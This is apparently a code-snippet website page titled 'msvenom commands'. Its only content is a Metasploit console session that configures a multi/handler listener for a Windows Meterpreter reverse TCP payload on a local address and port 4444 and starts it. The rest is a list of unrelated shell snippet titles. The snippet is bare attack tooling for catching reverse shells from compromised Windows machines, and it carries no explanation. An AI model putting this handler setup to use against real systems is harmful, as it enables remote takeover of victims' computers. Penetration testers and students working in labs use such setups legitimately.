Search
 
SCRIPT & CODE EXAMPLE
 

SHELL

msvenom commands

nli@nlistation:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
Comment

PREVIOUS NEXT
Code Example
Shell :: thunderbird reply 
Shell :: admin passwort powershell script 
Shell :: npm lavastore 
Shell :: How to remove one directory owned by a specific user on Linux 
Shell :: linux find follow symlinks 
Shell :: open ssl change pkcs1 to pkcs8 
Shell :: rsync only specific files but keep folders linux 
Shell :: passing variables into array 
Shell :: cups server cannot cancel jobs 
Shell :: cp directory with exclusion 
Shell :: invert mouse left right scroll in ubuntu 18.04 
Shell :: install OMV core packages on Debian 
Shell :: how to rename file sequential in ubuntu 
Shell :: build pdf from tex file linux 
Shell :: ubuntu cmd file last modified time 
Shell :: how to run .sh file 
Shell :: conda install packages from different channels 
Shell :: remove memcached ubuntu 
Shell :: how to take a screenshot on ubuntu 
Shell :: Non-base32 digit found 
Shell :: linux reboot every day 
Shell :: sed excape all quates 
Shell :: ssh how to start a script out of the session 
Shell :: visule stdio fro kali 
Shell :: pull all files out of subfolders recursively 
Shell :: ubuntu remove non-breaking spaces from file 
Shell :: mkdir NewDirectory and cd into it 
Shell :: how to extract sequential files multiple zip files at once 
Shell :: vim stuck in insert mode 
Shell :: python tree library 
ADD CONTENT
Topic
Content
Source link
Name
1+4 =